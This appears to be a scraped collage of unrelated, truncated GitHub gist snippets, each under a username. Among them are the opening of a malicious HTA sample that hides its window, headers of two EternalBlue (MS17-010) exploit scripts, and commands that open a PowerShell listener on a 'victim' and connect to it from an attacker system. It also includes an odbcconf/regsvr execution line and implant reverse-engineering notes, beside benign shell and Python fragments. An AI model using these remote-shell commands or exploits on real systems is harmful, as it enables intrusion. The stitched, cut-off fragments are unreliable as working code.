JohnLaTwC

## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();

try

mackwage

:: Windows 10 Hardening Script
:: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. 
:: Obligatory 'views are my own'. :) 
:: Thank you @jaredhaight for the Win Firewall config recommendations!
:: Thank you @ricardojba for the DLL Safe Order Search reg key! 
:: Thank you @jessicaknotts for the help on testing Exploit Guard configs and checking privacy settings!
:: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater
:

georgexsh

import sys

def j(lineno):
    frame = sys._getframe().f_back
    called_from = frame

    def hook(frame, event, arg):
        if event == 'line' and frame == called_from:
            try:
                frame.f_lineno = lineno

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

worawit

#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket

'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)

marcan

#!/boot/bzImage

# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
# Based on Linux 4.10-rc2.

# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name

mattifestation

# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme

# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"

NickTyrer

REGSVR odbcconf.dll

laanwj

Wladimir van der Laan 2016. This document is in the public domain.

BLATSTING reverse-engineering notes. Based on files from the EQGRP free dump,
more specifically in Firewall/BLATSTING/BLATSTING_201381/LP/lpconfig.

In https://musalbas.com/2016/08/16/equation-group-firewall-operations-catalogue.html,
BLATSTING is described as "A firewall software implant that is used with EGREGIOUSBLUNDER
(Fortigate) and ELIGIBLEBACHELOR (TOPSEC)".

If true, it's interesting how this implant can target both vendors. Presumably they both use the same Linux

cocoalabs

man() {
	env \
		LESS_TERMCAP_mb=$(printf "\e[1;31m") \
		LESS_TERMCAP_md=$(printf "\e[1;31m") \
		LESS_TERMCAP_me=$(printf "\e[0m") \
		LESS_TERMCAP_se=$(printf "\e[0m") \
		LESS_TERMCAP_so=$(printf "\e[1;44;33m") \
		LESS_TERMCAP_ue=$(printf "\e[0m") \
		LESS_TERMCAP_us=$(printf "\e[1;32m") \
			man "$@"